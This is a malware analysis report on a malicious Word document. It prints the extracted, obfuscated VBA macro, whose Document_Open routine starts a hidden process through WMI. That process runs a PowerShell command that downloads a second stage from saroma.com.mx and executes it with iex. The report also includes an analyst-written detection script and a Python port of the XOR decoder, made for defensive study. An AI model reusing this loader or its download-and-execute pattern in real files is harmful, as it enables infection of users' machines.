Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 82f1b3c9ca44a6ab…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 514.5 KB
Created: 2016-04-08 04:15:00
Authoring application: Microsoft Office Word
First seen: 2016-04-27
MD5: dc07e512c04653e24593545b28dc2d91
SHA-1: 4fee0c774fdc639ed467bee2233371aa1f630279
SHA-256: 82f1b3c9ca44a6ab8a984a473fb5033b0a182c135121bf6c3c514c4361116983
Risk score: 262

Malware Insights

MITRE ATT&CK
  T1059.005 Command and Scripting Interpreter: Visual Basic
  T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document carrying an obfuscated VBA macro that runs as soon as the file is opened, and its body prompts the user to enable macros, the usual social-engineering lure. The extracted macro (below) shows the whole chain. Document_Open calls YqvzgwAOVoRgBLX unless the document variable qUQrf already holds "toto". Every sensitive string is rebuilt at runtime by SqTpkuRcdB, a XOR decoder keyed on that same document variable; because the key lives in the Word document rather than in the VBA project, the decoded strings cannot be recovered from the macro text alone (only their lengths can). The call shape is nonetheless unambiguous: GetObject() on a moniker built from two decoded halves around a one-character host name, .Get(...).SpawnInstance_ with ShowWindow = 0, and .Create cmd, Null, objConfig, intProcessID, which is the Win32_ProcessStartup / Win32_Process.Create pattern for starting a hidden process through WMI instead of Shell() or WScript.Shell. The end of that command line is left in clear text and is PowerShell: (new-object Net.WebClient).<method>('http://saroma.com.mx/c.txt') | iex, inside an if/else whose two branches fetch the same URL, so whatever c.txt returns is executed in memory by Invoke-Expression. The 14-character decoded launcher and the 8+6-character method name match powershell.exe and DownloadString in length; that is an inference, not a decoded value. After the launch the macro displays a decoded 37-character MsgBox, writes "toto" into qUQrf and, if the document is not read-only, saves it. This is a run-once guard that also destroys the XOR key: a copy recovered from a victim after execution neither detonates nor decodes. ClamAV's Doc.Dropper.Agent-6537262-0 and the auto-exec/obfuscated-loader heuristics corroborate the verdict. In addition to the two tagged techniques, the launch relies on Windows Management Instrumentation (T1047) and PowerShell (T1059.001).
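Detection logic for the launch shape described above, as an added analyst example (not code from the page or from any vendor product). The event records are constructed and use Sysmon Event ID 1 field names (Image, ParentImage, CommandLine); the URL in event e2 is the one carried by this sample, the decoded prefix of its command line is unknown and left as a placeholder, and the powershell.exe launcher name is the length-based inference from the report. The point it demonstrates is that Win32_Process.Create starts the child under the WMI provider host, WmiPrvSE.exe, so a rule keyed only on an Office parent process never sees this sample.

```python
"""Process-creation triage for the WMI-launched download-to-iex shape.
Added analyst example; events are CONSTRUCTED, not real telemetry."""
import re

# Win32_Process.Create starts the new process under the WMI provider host, so
# the parent seen by Sysmon/EDR is WmiPrvSE.exe, not the Office application.
WMI_HOST = "wmiprvse.exe"
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Clear-text tail of this sample's command line:
#   (new-object Net.WebClient).DownloadString('<url>') | iex
DOWNLOAD_TO_IEX = re.compile(
    r"\.downloadstring\s*\(.*?\)\s*\|\s*(?:iex|invoke-expression)\b", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules ignore the install path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the rule names an event trips; an empty list means no match."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    if not image.startswith("powershell"):
        return []
    hits = []
    if parent in OFFICE_APPS:
        hits.append("office-parent")          # Shell()/WScript.Shell launches
    if parent == WMI_HOST:
        hits.append("wmi-host-parent")        # Win32_Process.Create launches
    if DOWNLOAD_TO_IEX.search(event.get("CommandLine", "")):
        hits.append("download-to-iex")
    if {"wmi-host-parent", "download-to-iex"} <= set(hits):
        hits.append("HIGH: WMI-launched download-to-iex (this sample)")
    return hits


# Constructed events. e1: direct launch from Word. e2: this sample's shape.
# e3: routine scheduled script. e4: admin tooling launched through WMI.
EVENTS = [
    {"id": "e1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -c (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage2.ps1') | iex"},
    {"id": "e2",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe <121 decoded chars, not recoverable> "
                    "DownloadString('http://saroma.com.mx/c.txt') | iex } else "
                    "{(new-object Net.WebClient).DownloadString"
                    "('http://saroma.com.mx/c.txt') | iex}"},
    {"id": "e3",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\inventory.ps1"},
    {"id": "e4",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\collect.ps1"},
]


def scan(events=EVENTS) -> dict:
    """Map event id -> rule hits for a batch of records."""
    return {e["id"]: classify(e) for e in events}


if __name__ == "__main__":
    for eid, hits in scan().items():
        print(eid, hits or "-")
```

The single rules are deliberately kept separate: wmi-host-parent alone (e4) is low confidence because management agents also create processes through WMI, and office-parent alone only catches the Shell()/WScript.Shell variants; it is the combination of the WMI parent with an in-memory download-and-execute command line that reproduces this sample and deserves the high-severity tag.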

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6537262-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6537262-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://saroma.com.mx/c.txt (in document text, OLE body). This is the one actionable indicator: the same URL also sits in clear text in the macro's objProcess.Create command line, where it is the second-stage download location.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/rights/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    The last seven are XML namespace identifiers (RDF, Dublin Core, Adobe XMP and Photoshop, IPTC, DrawingML) that travel with embedded image metadata and drawing parts; nothing in the sample contacts them at runtime and they should not be added to block lists.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3223 bytes
SHA-256: 7b5cd7e554bd2ef7a8be5b100ad2673c92ff39b3bd2b5e4ba07fcbd87990afc3

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function SqTpkuRcdB(fFMhggaWle As Variant, JhccsXpvUr As Integer)
    ' [analyst note] XOR string decoder. The key is the Word document variable
    ' "qUQrf" (stored in the document, not in the VBA project); array byte i is
    ' XORed with the key character at position (i Mod Len(key)) + offset.
    Dim tQbINoouvS, DeWSFVYrlv As String, TSEaNuXTpx, GzXmCDIVBC
    DeWSFVYrlv = ActiveDocument.Variables("qUQrf").Value()
    tQbINoouvS = ""
    TSEaNuXTpx = 1
    While TSEaNuXTpx < UBound(fFMhggaWle) + 2
        GzXmCDIVBC = TSEaNuXTpx Mod Len(DeWSFVYrlv): If GzXmCDIVBC = 0 Then GzXmCDIVBC = Len(DeWSFVYrlv)
        tQbINoouvS = tQbINoouvS + Chr(Asc(Mid(DeWSFVYrlv, GzXmCDIVBC + JhccsXpvUr, 1)) Xor CInt(fFMhggaWle(TSEaNuXTpx - 1)))
        TSEaNuXTpx = TSEaNuXTpx + 1
    Wend
    SqTpkuRcdB = tQbINoouvS
End Function

Public Function YqvzgwAOVoRgBLX()
    ' [analyst note] decoded lengths: x1 = 8, h = 3, o = 5+5+4 = 14, abcdef = 3+3 = 6
    x1 = SqTpkuRcdB(Array(41, 13, 20, 8, 33, 24, 88, 40), 266)
    h = SqTpkuRcdB(Array(34, 64, 55), 263)
    o = SqTpkuRcdB(Array(67, 7, 61, 93, 16), 59) & SqTpkuRcdB(Array(38, 57, 9, 6, 3), 11) & SqTpkuRcdB(Array(90, 41, 61, 11), 302)
    Const HIDDEN_WINDOW = 0
    strComputer = SqTpkuRcdB(Array(96), 243)
    abcdef = h & SqTpkuRcdB(Array(24, 45, 84), 299)
    ' [analyst note] WMI launch: GetObject(<11 chars> & strComputer & <11 chars>),
    ' .Get(<20 chars>).SpawnInstance_ with ShowWindow = 0, then .Create cmd, Null,
    ' startup, pid is the Win32_Process.Create call shape; the child starts hidden
    ' and not as a direct child of WINWORD.EXE.
    Set objWMIService = GetObject(SqTpkuRcdB(Array(68, 51, 9, 35, 80, 95, 48, 24, 99, 17, 62), 0) & strComputer & SqTpkuRcdB(Array(100, 55, 92, 9, 76, 44, 15, 3, 40, 55, 104), 244))
    Set objStartup = objWMIService.Get(SqTpkuRcdB(Array(99, 47, 31, 74, 83, 16, 53, 51, 10, 82, 51, 39, 26, 29, 29, 87, 58, 32, 65, 2), 223))
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject(SqTpkuRcdB(Array(68, 51, 9, 35, 80, 95, 48, 24, 99, 17, 62), 0) & strComputer & SqTpkuRcdB(Array(22, 28, 37, 54, 18, 40, 15, 57, 7, 53, 116, 79, 37, 91, 28, 4, 86, 109, 31, 16, 57, _
        55, 43, 63, 70), 274))
    ' [analyst note] 121 decoded chars, then clear-text PowerShell that pipes the
    ' download of http://saroma.com.mx/c.txt into iex (Invoke-Expression).
    objProcess.Create o & SqTpkuRcdB(Array(18, 99, 19, 12, 46, 14, 52, 18, 34, 14, 27, 36, 53, 38, 6, 23, 20, 77, 9, 26, 33, _
        7, 34, 30, 68, 67, 29, 2, 61, 28, 31, 60, 58, 71, 14, 46, 8, 101, 14, 40, 45, _
        0, 11, 31, 121, 106, 47, 3, 19, 65, 54, 10, 35, 45, 47, 22, 85, 12, 25, 87, 17, _
        40, 66, 83, 93, 22, 66, 29, 31, 107, 25, 63, 0, 27, 36, 26, 6, 0, 55, 125, 78, _
        9, 3, 67, 8, 75, 117, 85, 0, 112, 114, 79, 84, 8, 88, 12, 21, 78, 76, 61, 17, _
        27, 21, 10, 14, 101, 32, 86, 61, 65, 96, 54, 81, 11, 36, 45, 1, 59, 60, 66, 116), 64) & x1 & abcdef & "('http://saroma.com.mx/c.txt') | iex } else {(new-object Net.WebClient)." & x1 & abcdef & "('http://saroma.com.mx/c.txt') | iex}", Null, objConfig, intProcessID
    ' [analyst note] 37-char decoded message shown to the user after the launch.
    MsgBox (SqTpkuRcdB(Array(27, 4, 26, 40, 88, 39, 27, 49, 14, 36, 18, 41, 4, 45, 67, 34, 23, 47, 34, 70, 34, _
        90, 86, 19, 87, 71, 116, 63, 12, 53, 48, 41, 35, 13, 93, 54, 66), 186))
End Function

Private Sub Document_Open()
    ' [analyst note] run-once guard: after the first run qUQrf is overwritten with
    ' "toto" (which also destroys the XOR key) and the document is saved to disk.
    If ActiveDocument.Variables("qUQrf").Value <> "toto" Then
        YqvzgwAOVoRgBLX
        ActiveDocument.Variables("qUQrf").Value = "toto"
        If ActiveDocument.ReadOnly = False Then
            ActiveDocument.Save
        End If
    End If
End Sub
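The decoder above ported to Python, together with a map of which key positions each call site reads, as an added analyst example (not part of the sample or of oletools). The real key is the document variable qUQrf, which is not in the extracted VBA and is not known here, so DEMO_KEY is constructed; the split of o into power / shell / .exe is an assumption used only to exercise the round trip, and the call-site table is read directly off the macro.

```python
"""Port of the macro's XOR decoder SqTpkuRcdB plus a key-window analysis of
its call sites. Added analyst example. DEMO_KEY is CONSTRUCTED; the sample's
real key (document variable "qUQrf") is not available from macros.bas."""
import random
import string


def sqtpkurcdb(key: str, data: list, offset: int) -> str:
    """Faithful port: the VBA loop runs i = 1 .. UBound+1 and Mid() is 1-based."""
    n = len(key)
    out = []
    for i in range(1, len(data) + 1):
        pos = i % n or n                      # GzXmCDIVBC, with 0 -> Len(key)
        k = key[pos + offset - 1]             # Mid(DeWSFVYrlv, pos + offset, 1)
        out.append(chr(ord(k) ^ int(data[i - 1])))
    return "".join(out)


def encode(key: str, plaintext: str, offset: int) -> list:
    """Inverse of the decoder (XOR is symmetric): builds a macro-style array."""
    n = len(key)
    return [ord(c) ^ ord(key[(i % n or n) + offset - 1])
            for i, c in enumerate(plaintext, 1)]


def recover_key_slice(data: list, guessed_plaintext: str, offset: int) -> dict:
    """Known-plaintext attack on one call: a correct guess for the decoded
    string yields {1-based key position: key char} for that window only.
    Assumes len(key) > len(data), which min_key_len() shows is always true."""
    return {i + offset: chr(b ^ ord(c))
            for i, (b, c) in enumerate(zip(data, guessed_plaintext), 1)}


# (array length, offset) of every decoder call in YqvzgwAOVoRgBLX, taken from
# the extracted macro. Lengths are all that is recoverable without the key.
CALL_SITES = {
    "winmgmts_prefix": (11, 0),      "launcher_part2": (5, 11),
    "launcher_part1": (5, 59),       "create_cmdline": (121, 64),
    "msgbox_text": (37, 186),        "wmi_get_class": (20, 223),
    "strComputer": (1, 243),         "namespace_suffix": (11, 244),
    "h": (3, 263),                   "x1": (8, 266),
    "process_class_path": (25, 274), "abcdef_part2": (3, 299),
    "launcher_part3": (4, 302),
}


def min_key_len() -> int:
    """Mid() past the end of the key returns "" and Asc("") raises, so the
    variable must be at least this long for the macro to run at all."""
    return max(length + offset for length, offset in CALL_SITES.values())


def key_windows() -> dict:
    """1-based key positions each call reads. With len(key) >= min_key_len()
    every array is shorter than the key, so i Mod Len(key) == i and nothing
    wraps: the window is simply offset+1 .. offset+length."""
    return {name: range(offset + 1, offset + length + 1)
            for name, (length, offset) in CALL_SITES.items()}


def windows_overlap() -> bool:
    """True if any two call sites share key material."""
    seen = set()
    for w in key_windows().values():
        if seen.intersection(w):
            return True
        seen.update(w)
    return False


# Constructed demo key: printable and long enough; NOT the sample's key.
DEMO_KEY = "".join(random.Random(1).choices(string.ascii_letters + string.digits, k=320))


def demo_roundtrip() -> str:
    """Encode an assumed launcher name the way the author would have, then
    decode it with the three (array, offset) pairs the macro uses for `o`."""
    parts = [("power", 59), ("shell", 11), (".exe", 302)]   # assumed split
    arrays = [(encode(DEMO_KEY, p, off), off) for p, off in parts]
    return "".join(sqtpkurcdb(DEMO_KEY, a, off) for a, off in arrays)


if __name__ == "__main__":
    print("minimum key length:", min_key_len())
    for name, w in key_windows().items():
        print(f"{name:>20}: key[{w.start}..{w.stop - 1}]")
    print("windows overlap:", windows_overlap())
    print("round trip:", demo_roundtrip())
```

Two things fall out of the call-site table. First, qUQrf must be at least 306 characters, so the i Mod Len(key) branch in the decoder never actually wraps (the longest array is 121). Second, the thirteen windows are pairwise disjoint: the document variable is used as a one-time pad, and a known-plaintext guess for one string (for example powershell.exe for o) recovers only the key bytes of that string's own windows, never the 121 bytes under the command line or the 37 under the MsgBox. Decoding the remaining strings therefore requires the variable itself: read it in an isolated VM before Document_Open has run and saved "toto" over it, or carve it from the document's binary streams, since Word keeps document variables outside the VBA project and the extracted macros.bas cannot yield it.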